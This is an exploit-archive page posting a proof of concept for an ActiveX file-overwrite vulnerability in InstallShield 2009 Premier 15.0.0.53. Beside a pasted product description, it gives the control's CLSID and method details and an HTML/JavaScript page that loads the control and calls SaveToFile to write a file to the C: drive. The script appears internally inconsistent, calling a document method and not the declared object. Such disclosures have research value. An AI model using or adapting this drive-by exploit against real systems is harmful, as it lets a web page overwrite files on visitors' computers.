exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Installshield 2009 File Overwrite

Installshield 2009 File Overwrite
Posted Sep 15, 2009
Authored by the_Edit0r

Installshield 2009 Premier version 15.0.0.53 suffers from an Active-X related file overwrite vulnerability.

tags | exploit, activex
SHA-256 | b254ff72b7fc8200478517ccf055d6292ff84b11d0b2cb442a243582d99ff3fb

Installshield 2009 File Overwrite

Change Mirror Download
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""" :::::: :: :: :: :: :: :::: """
""" :: :: :: :: :::::: .. :::: :: """
""" ::::: ::: ::::: :: :: :: :: :: :::: """
""" :: :: :: :: : :: :: :: :: :: :: """
""" :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """
""" :: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Anti-Security Research Team & Security Institute

#[+] Bug : Installshiled 2009 premier 15.0.0.53 Activex (ISWiAutomation15.dll) File Overwrite Expl0it
#[+] program Download : http://www.installshield.com/downloads
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member


# Part Description :
--------------------

InstallShield lets you easily create Windows Installer and InstallScript installations and extend them
to database servers, Web services, and mobile devices. New Features InstallShield includes the following
new features. Ability to Associate InstallShield Prerequisites with Features for Chaining Installations
InstallShield now enables you to associate InstallShield prerequisites with one or more features. This
new type of InstallShield prerequisite is called a feature prerequisite. It is installed if a feature
that contains the prerequisite is installed and if the prerequisite is not already installed on the system.
Including InstallShield prerequisites in your project enables you to chain multiple installations together,
bypassing the Windows Installer limitation that permits only one Execute sequence to be run at a time.The
Setup.exe setup launcher serves as a bootstrap application that manages the chaining. The Redistributables
view is where you add InstallShield prerequisites to a project and specify whether you want them to run
before your main installation or be associated with one or more features in your main installation.Previously,
all InstallShield prerequisite installations were run before the main installation ran, and the InstallShield
prerequisites could not be associated with any features. This type of prerequisite, which is still available,
is called a setup prerequisite. Basic MSI and Web projects include support for this feature.

------------------------------------

targetFile = "E:\Program Files\InstallShield\2009\System\ISWiAutomation15.dll"
prototype = "Function InsertCustomAction ( ByVal pCustomAction As _ISWiCustomAction , ByVal sComment As String , ByVal sCondition As String , ByVal lSequenceNumber As Long ) As _ISWiSequenceRecord"
memberName = "InsertCustomAction"
progid = "ISWiAuto15.ISWiSequence"

# Part Expl0it & Bug Codes ( Poc ) :
------------------------------------

<b>
Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/>
by : the_Edit0r <b/>
<b/>
<object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object>
<script>

try{
var obj = document.InsertCustomAction('Edit0r');
obj.AddPage(1);
obj.SaveToFile("C:/system_.ini");
window.alert('check C:');
} catch(err){ window.alert('Poc failed'); }
</script>

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close